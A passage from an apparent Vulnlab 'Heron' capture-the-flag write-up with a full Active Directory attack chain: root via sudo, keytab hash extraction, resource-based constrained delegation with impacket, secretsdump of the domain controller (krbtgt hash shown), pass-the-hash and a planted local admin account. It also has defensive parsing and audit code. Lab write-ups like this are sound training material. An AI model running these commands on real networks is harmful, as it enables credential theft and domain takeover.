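        elif name not in EXPECTED_PROCESSES and name != app_exe.lower():
            findings.append("aspNetCore processPath is neither dotnet nor the app: %r" % proc)
        if args.startswith(ENCODED_FLAGS):
            findings.append("aspNetCore arguments pass an encoded command")
    for handler in root.iter("add"):
        path = handler.attrib.get("path", "*")
        if handler.attrib.get("modules") == "AspNetCoreModuleV2" and path != "*":
            findings.append("AspNetCore handler bound to an unusual path: %r" % path)
    return findings
```

Hashing the deployed web.config and alerting on changes to it, or on IIS spawning powershell.exe, catches the same thing at runtime.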
Privilege escalation on the Ubuntu box:
pentest@frajmp:/tmp$ su _local
Password:
_local@frajmp:/tmp$ sudo -l
[sudo] password for _local:
Matching Defaults entries for _local on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User _local may run the following commands on localhost:
(ALL : ALL) ALL
_local@frajmp:/tmp$ sudo su
root@frajmp:/tmp# cd /root
root@frajmp:~# ls
flag.txt snap
root@frajmp:~# cat flag.txt
VL{51<redacted>60}
We transfer /etc/krb5.keytab to the Kali box with nc and run keytabextract.py on it:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HERON.VL
SERVICE PRINCIPAL : FRAJMP$/
NTLM HASH : 6f<redacted>f7
AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
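As an added example (not the keytabextract.py used above), a minimal parser for the MIT 0x0502 keytab format that lists each principal's keys and flags RC4-HMAC entries, since that key is the account's NT hash and a readable keytab therefore hands it out. The sample keytab is constructed in the block with made-up key bytes for the same principal and enctypes as the one above.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

RC4_HMAC = 23  # enctype whose key is the unsalted NT hash of the password


@dataclass
class KeytabEntry:
    principal: str  # components joined with "/", e.g. "FRAJMP$"
    realm: str
    enctype: int
    kvno: int
    timestamp: int
    key: bytes


def _octets(data: bytes) -> bytes:
    return struct.pack(">H", len(data)) + data


def _read_octets(blob: bytes, pos: int) -> Tuple[bytes, int]:
    (n,) = struct.unpack_from(">H", blob, pos)
    return blob[pos + 2:pos + 2 + n], pos + 2 + n


def build_keytab(entries: List[KeytabEntry]) -> bytes:
    """Serialise entries in MIT keytab format 0x0502 (big-endian fields)."""
    out = b"\x05\x02"
    for e in entries:
        comps = e.principal.split("/")
        body = struct.pack(">H", len(comps)) + _octets(e.realm.encode())
        for c in comps:
            body += _octets(c.encode())
        # name_type (1 = NT-PRINCIPAL), timestamp, 8-bit vno
        body += struct.pack(">IIB", 1, e.timestamp, e.kvno & 0xFF)
        body += struct.pack(">H", e.enctype) + _octets(e.key)
        body += struct.pack(">I", e.kvno)  # optional 32-bit vno
        out += struct.pack(">i", len(body)) + body
    return out


def parse_keytab(blob: bytes) -> List[KeytabEntry]:
    """Parse a 0x0502 keytab; negative entry sizes mark deleted slots."""
    if blob[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version %r" % blob[:2])
    pos, entries = 2, []
    while pos + 4 <= len(blob):
        (size,) = struct.unpack_from(">i", blob, pos)
        pos += 4
        if size < 0:
            pos += -size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        realm, pos = _read_octets(blob, pos)
        comps = []
        for _ in range(ncomp):
            comp, pos = _read_octets(blob, pos)
            comps.append(comp.decode())
        _name_type, ts, vno8 = struct.unpack_from(">IIB", blob, pos)
        pos += 9
        (enctype,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        key, pos = _read_octets(blob, pos)
        kvno = vno8
        if end - pos >= 4:  # 32-bit vno present
            (vno32,) = struct.unpack_from(">I", blob, pos)
            kvno = vno32 or vno8
        pos = end
        entries.append(KeytabEntry("/".join(comps), realm.decode(), enctype, kvno, ts, key))
    return entries


def audit_keytab(blob: bytes) -> List[str]:
    """Flag every RC4-HMAC key: holding it is holding the account's NT hash."""
    notes = []
    for e in parse_keytab(blob):
        if e.enctype == RC4_HMAC:
            notes.append("%s@%s kvno %d: rc4-hmac key present (NT hash equivalent)"
                         % (e.principal, e.realm, e.kvno))
    return notes


# Constructed sample: same principal and enctypes as the keytab above, with
# made-up key bytes (the real keys are redacted in the writeup).
SAMPLE_KEYTAB = build_keytab([
    KeytabEntry("FRAJMP$", "HERON.VL", 18, 2, 1717257000, bytes(range(32))),
    KeytabEntry("FRAJMP$", "HERON.VL", 17, 2, 1717257000, bytes(range(16))),
    KeytabEntry("FRAJMP$", "HERON.VL", 23, 2, 1717257000, bytes(range(16, 32))),
])
```

Keeping /etc/krb5.keytab root-only and dropping RC4 from the computer account's msDS-SupportedEncryptionTypes removes both halves of this finding.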
We do some more enumeration … and find the password Depl<redacted>Dealt working for julian.pratt:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.134.197\\home$ -U 'julian.pratt'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\julian.pratt]: Depl<redacted>Dealt
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:445 ... OK
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
. D 0 Sun Jun 2 12:47:14 2024
.. D 0 Sat Jun 1 17:10:46 2024
frajmp.lnk A 1443 Sun Jun 2 12:47:47 2024
Is there a way to -auto login- in PuTTY with a password- - Super User.url A 117 Sat Jun 1 17:44:44 2024
Microsoft Edge.lnk A 2312 Sat Jun 1 17:44:38 2024
mucjmp.lnk A 1441 Sun Jun 2 12:47:33 2024
6261499 blocks of size 4096. 1985339 blocks available
smb: \Julian.Pratt\> mget *.lnk
Get file frajmp.lnk? y
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (17.2 KiloBytes/sec) (average 17.2 KiloBytes/sec)
Get file Microsoft Edge.lnk? y
getting file \Julian.Pratt\Microsoft Edge.lnk of size 2312 as Microsoft Edge.lnk (26.9 KiloBytes/sec) (average 22.1 KiloBytes/sec)
Get file mucjmp.lnk? y
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (17.8 KiloBytes/sec) (average 20.7 KiloBytes/sec)
smb: \Julian.Pratt\>
From BloodHound, we find that adm_prju is in the ADMINS_T1 group, which has the WriteAccountRestrictions privilege over MUCDC.
Having WriteAccountRestrictions means that adm_prju has write access to all of the attributes on the machine, notably msDS-AllowedToActOnBehalfOfOtherIdentity. If we can modify this attribute, we can abuse resource-based constrained delegation.
Next we do the RBCD (resource-based constrained delegation) attack, allowing FRAJMP$ (whose keys we have from the keytab) to act on behalf of other identities on MUCDC$:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip 10.10.165.85 -action 'write' 'heron.vl/adm_prju:ay<redacted>B4'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:389 ... OK
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] FRAJMP$ (S-1-5-21-1568358163-2901064146-3316491674-27101)
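To see what impacket-rbcd actually wrote, here is an added example (not from the writeup or from impacket) that parses an msDS-AllowedToActOnBehalfOfOtherIdentity value, a self-relative security descriptor whose DACL lists the accounts allowed to delegate, and compares it against an approved list; a defender can run the same parser over that attribute read from every computer object. The descriptor is built locally from the FRAJMP$ SID printed above; the access mask and the missing owner/group are simplifications, the DACL layout is the real one.

```python
import struct
from typing import List, Tuple

# SID that impacket-rbcd reported for FRAJMP$ above; the descriptor built
# from it here is constructed for the example, not read from the DC.
FRAJMP_SID = "S-1-5-21-1568358163-2901064146-3316491674-27101"

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 2
FULL_CONTROL = 0x000F01FF  # mask the usual tooling writes into the ACE
SD_HEADER = "<BBHIIII"      # Revision, Sbz1, Control, Owner, Group, Sacl, Dacl


def sid_to_bytes(sid: str) -> bytes:
    """Encode a textual SID as a binary SID structure."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("bad SID: %r" % sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs))
            + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(data: bytes, offset: int) -> Tuple[str, int]:
    """Decode a binary SID at offset; return (text, bytes consumed)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    text = "S-%d-%d" % (revision, authority)
    for s in subs:
        text += "-%d" % s
    return text, 8 + 4 * count


def build_rbcd_descriptor(sids: List[str]) -> bytes:
    """Build the self-relative SD the attribute holds: a DACL of ALLOW ACEs."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        ace_size = 4 + 4 + len(sid_b)  # ACE header + mask + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size,
                            FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(aces), len(sids), 0)
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         0, 0, 0, struct.calcsize(SD_HEADER))
    return header + acl + aces


def allowed_to_act(blob: bytes) -> List[str]:
    """List the SIDs granted by ALLOW ACEs in the attribute's DACL."""
    if not blob:
        return []  # attribute not set: nobody may delegate to this account
    revision, _, control, _, _, _, dacl_off = struct.unpack_from(SD_HEADER, blob, 0)
    if revision != 1:
        raise ValueError("unexpected security descriptor revision %d" % revision)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, dacl_off)
    pos = dacl_off + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_from_bytes(blob, pos + 8)  # skip header + mask
            sids.append(sid)
        pos += ace_size
    return sids


def audit(blob: bytes, approved: List[str]) -> List[str]:
    """Return SIDs in the attribute that are not on the approved list."""
    return [s for s in allowed_to_act(blob) if s not in approved]
```

On a domain controller the approved list should normally be empty, so any SID the audit returns for MUCDC$ is worth an alert.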
Get the service ticket:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :6f<redacted>f7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... HERON.VL:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... HERON.VL:88 ... OK
[*] Impersonating _admin
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... heron.vl:88 ... OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:1080 ... heron.vl:88 ... OK
[*] Saving ticket in _admin@cifs_mucdc.heron.vl@HERON.VL.ccache
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ export KRB5CCNAME=_admin@cifs_mucdc.heron.vl@HERON.VL.ccache
and run secretsdump with that ticket:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-secretsdump -k mucdc.heron.vl
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:445 ... OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7a8b61a266b3e6ba7b55725d51f2b723
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36<redacted>4e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
HERON\MUCDC$:plain_password_hex:6ba8a<redacted>3adc3
HERON\MUCDC$:aad3b435b51404eeaad3b435b51404ee:a3623<redacted>94ee:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x76a0d28b7925171e2b82994b58e5991310b49216
dpapi_userkey:0xda9a3255d163e84c6ab4e578f44c544e80285f19
[*] NL$KM
0000 5C A7 E2 A0 9A 0F 0E A7 0A 6F 35 33 21 07 83 01 \........o53!...
0010 93 8A 8A 6D 21 3B C2 CA 60 E6 E6 B6 5A 22 04 A2 ...m!;..`...Z"..
0020 D1 F4 93 69 36 20 AF BB F7 38 31 3A BE E5 D5 29 ...i6 ...81:...)
0030 55 5E 2B 54 ED A4 1B 52 03 FD 77 75 AC F2 9A 58 U^+T...R..wu...X
NL$KM:5ca7e2a09a0f0ea70a6f353321078301938a8a6d213bc2ca60e6e6b65a2204a2d1f493693620afbbf738313abee5d529555e2b54eda41b5203fd7775acf29a58
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:49667 ... OK
_admin:500:aad3b435b51404eeaad3b435b51404ee:39<redacted>38:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:654<redacted>d2:::
Get the flags:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.165.85\\C$ -U '_admin' --pw-nt-hash 39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.165.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Thu Jun 6 17:01:47 2024
--snip--
System Volume Information DHS 0 Sun May 26 11:48:42 2024
transfer D 0 Sun May 26 13:51:27 2024
Users DR 0 Sat Jun 1 17:43:04 2024
webaccounting D 0 Fri Jun 7 08:14:04 2024
Windows D 0 Sun Jun 2 17:26:03 2024
6261499 blocks of size 4096. 1962809 blocks available
Beyond root
proxychains xfreerdp /u:_admin /pth:39<redacted>38 /w:1566 /h:968 /v:10.10.134.197:3389
-> RDP into MUCDC is not allowed for _admin, so we use wmiexec instead and add a local admin account we can RDP with:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-wmiexec _admin@10.10.134.197 -hashes aad3b435b51404eeaad3b435b51404ee:39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:49669 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
heron\_admin
C:\>net user /add puck Password123!
The command completed successfully.
C:\>net localgroup Administrators puck /add
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:135 ... OK
The command completed successfully.
$ proxychains xfreerdp /u:puck /p:Password123! /w:1566 /h:968 /v:10.10.134.197:3389
---
C:\Users\puck>net user adm_hoka
User name adm_hoka
Full Name adm_hoka
Comment t0
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2024 4:50:28 AM
Password expires Never
Password changeable 5/27/2024 4:50:28 AM
Password required Yes
User may change password Yes
Workstations allowed admjmp_t0
Logon script \\heron.vl\SYSVOL\heron.vl\scripts\logon.vbs
User profile
Home directory \\mucdc.heron.vl\home$\adm_hoka
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *admins_t0
The command completed successfully.
---
logon.vbs contains
Option Explicit
Dim objShell, bgInfoPath, bgInfoConfigPath
Set objShell = CreateObject("WScript.Shell")
bgInfoPath = "\\heron.vl\SYSVOL\heron.vl\scripts\Bginfo64.exe"
bgInfoConfigPath = "\\heron.vl\SYSVOL\heron.vl\scripts\bginfo.bgi"
objShell.Run """" & bgInfoPath & """ """ & bgInfoConfigPath & """ /timer:0", 0, True
Set objShell = Nothing
This chain was really fun 🙂
